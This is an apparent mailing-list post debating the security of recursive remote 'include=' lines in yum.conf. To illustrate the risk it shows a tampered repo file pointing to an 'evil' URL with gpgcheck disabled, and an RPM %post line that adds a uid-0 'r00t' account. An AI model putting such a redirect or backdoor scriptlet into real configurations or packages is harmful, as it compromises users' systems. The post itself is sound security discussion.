> First, includes are recursive. e.g. yum.conf may include a file that > includes a file that includes a file ad infinitum. And, it is possible > to include either local files or remote (http/ftp) files. The problem > here is that it is (currently) possible for a remote file to include any > other file. When the remote file is managed by the user this isn't a big > deal but if repositories started providing files for users to include= > in their yum.conf's, this could lead to security concerns in that the > remote file can basically set arbitrary values in yum.conf (adding other > repositories behind the scenes, etc). Or, if a remote file is > compromised, it could point to some other repository URL without the > user knowing, which may allow a malicious someone to update almost > anything (in the absence of gpg). The first person who suggests gpg signing config files gets beaten. :) My general take is that this no big deal - but there is the possibility for much abuse and much flexibility. Hard call between the two of them. from a standpoint of flexibility being able to get parts of your config file from an arbitrary url is useful and handy - on the other hand that think of this config file: [main] include=http://domain.org/mymain.cgi include=http://freshrpms.net/default-repo include=http://fedora.us/default.repo include=http://joeblows/default.repo now fedora and freshrpms are trustworthy folks - but joeblow might not be or none of their security might be good enough and the default.repo for joeblows might normally be: [joeblows] name = joe blow's rpms - the best rpms money can buy baseurl=http://joeblows/rpms/ gpgcheck=1 it could become: [joeblows] name = joe blow's rpms - the best rpms money can buy baseurl=http://someotherplacew/evil/rpms/ gpgcheck=0 the results could be - that someotherplace has taken all of joeblows rpms and rebuilt them with: %post /usr/sbin/adduser -r -u 0 -p somepass r00t Clearly anyone can see the implications of that. include= could give a lot of flexibility in a controlled environment, or it could allow more boxes to be rooted quickly :) I just wanted to add a precise example to ryan's comment. -sv
